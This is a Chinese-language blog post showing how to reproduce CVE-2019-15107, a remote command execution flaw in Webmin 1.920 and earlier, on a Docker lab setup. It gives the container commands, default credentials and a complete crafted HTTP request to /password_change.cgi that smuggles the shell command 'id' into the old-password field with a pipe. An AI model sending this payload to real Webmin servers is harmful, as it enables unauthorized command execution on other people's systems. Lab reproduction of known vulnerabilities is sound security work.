溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

Webmin RCE漏洞CVE-2019-15107是怎么復(fù)現(xiàn)的

發(fā)布時間:2021-12-20 18:04:54 來源:億速云 閱讀:217 作者:柒染 欄目:大數(shù)據(jù)

這篇文章將為大家詳細(xì)講解有關(guān)Webmin RCE漏洞CVE-2019-15107是怎么復(fù)現(xiàn)的,文章內(nèi)容質(zhì)量較高,因此小編分享給大家做個參考,希望大家閱讀完這篇文章后對相關(guān)知識有一定的了解。

0x00 前言

本來前一陣就想復(fù)現(xiàn)來著,但是官網(wǎng)的版本已經(jīng)更新了,直到今天才發(fā)現(xiàn)Docker上有環(huán)境,才進(jìn)行了復(fù)現(xiàn)

0x01影響版本

Webmin<=1.920

0x02 環(huán)境搭建

docker search webmindocker pull piersonjarvis/webmin-sambadocker run -d -p 10000:80 piersonjarvis/webmin-samba

Webmin RCE漏洞CVE-2019-15107是怎么復(fù)現(xiàn)的

訪問你的ip:10000即可訪問1.920版本的webmin

使用賬號密碼:root/webmin登錄到后臺

開啟密碼重置功能:

Webmin--Webmin confuration--Authentication

Webmin RCE漏洞CVE-2019-15107是怎么復(fù)現(xiàn)的

0x03 漏洞利用

經(jīng)過長時間的尋找,未找到修改密碼的接口,所以隨便抓個包手動構(gòu)造了一個,數(shù)據(jù)包如下:

POST /password_change.cgi HTTP/1.1Host: 136.244.xx.xx:10000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: text/html, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://136.244.xx.xx:10000/passwd/index.cgi?xnavigation=1X-PJAX: trueX-PJAX-Container: [data-dcontainer]X-PJAX-URL: passwd/edit_passwd.cgi?user=rootX-Requested-From: passwdX-Requested-From-Tab: webminX-Requested-With: XMLHttpRequestContent-Type: text/plain;charset=UTF-8Content-Length: 49DNT: 1Connection: close
user=laemon&old=123123|id&new1=123456&new2=123456

最終執(zhí)行命令成功

Webmin RCE漏洞CVE-2019-15107是怎么復(fù)現(xiàn)的

關(guān)于Webmin RCE漏洞CVE-2019-15107是怎么復(fù)現(xiàn)的就分享到這里了,希望以上內(nèi)容可以對大家有一定的幫助,可以學(xué)到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI